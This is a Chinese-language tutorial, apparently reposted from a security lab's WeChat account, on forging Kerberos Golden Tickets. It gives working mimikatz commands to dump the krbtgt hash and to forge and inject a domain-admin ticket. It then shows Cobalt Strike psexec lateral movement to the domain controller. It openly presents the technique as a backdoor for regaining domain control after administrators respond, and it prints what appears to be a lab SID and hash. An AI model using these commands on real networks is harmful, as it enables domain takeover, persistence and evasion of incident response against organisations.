黄金票据

介绍

Golden Ticket黄金票据实际上就是通过伪造TGT，来达到获取任意服务ST的目的。

TGT是由KDC用krbtgt加密session-key、用户名、时间戳等信息生成的，所以首先要伪造session-key，然后伪造TGT注入到内存中，这实际上是上节课流程图中的第一、二步。随后正常走流程即可。

而我们第三步的TGS-Request请求也不会验证用户的合法性，所以只要得到krbtgt的hash、域sid就可以伪造TGT了。

使用场景

当我们拿到了域控，但后续可能被察觉了，管理员修改了密码，域控权限丢掉了，但krbtgt密码却没改，那么就可以利用黄金票据为普通用户生成一个管理员的TGT，从而变成域管，相当于一种后门。所以前提是拿到域控后保存了krbtgt的hash和域管的SID，后续域控权丢失，可以拿来利用。

测试

首先需要知道域管的SID：

然后获取krbtgt的hash，这里用mimikatz获取，命令如下：

mimikatz "privilege::debug" "lsadump::lsa /patch" exit > hash.txt

得到域管SID和krbtgt hash：

S-1-5-21-2486160410-3819302421-1811111242-500747986ff524aff68da010098acbc0c08

然后使用mimikatz进行票据伪造，伪造前需要先情况本机的票据缓存，避免票据过多，影响结果：

kerberos::purge

清空后伪造票据并注入内存，命令如下：

kerberos::golden /user:administrator /domain:afa.com /sid:S-xxxxx /krbtgt:xxxxx /ptt

这里注意sid后门那个500要去掉，其中ptt参数意识是将伪造的票据注入到内存以供使用：

使用klist命令查看当前机的票据，在票据注入前，是无法列出域控c盘共享的，注入后，可以成功访问：

拥有写入权限：

或者我们用CS操作，CS本质上也是运行的上面的mimikatz命令：

填入相关信息即可：

除了列出共享、写入文件，我们可以进行横向，在CS中执行psexec64，上线域控：

jump psexec64 dc-afa.afa.com test-8080

或者上传马、横向工具到域控上也可以。

完

原文始发于微信公众号（aFa攻防实验室）：黄金票据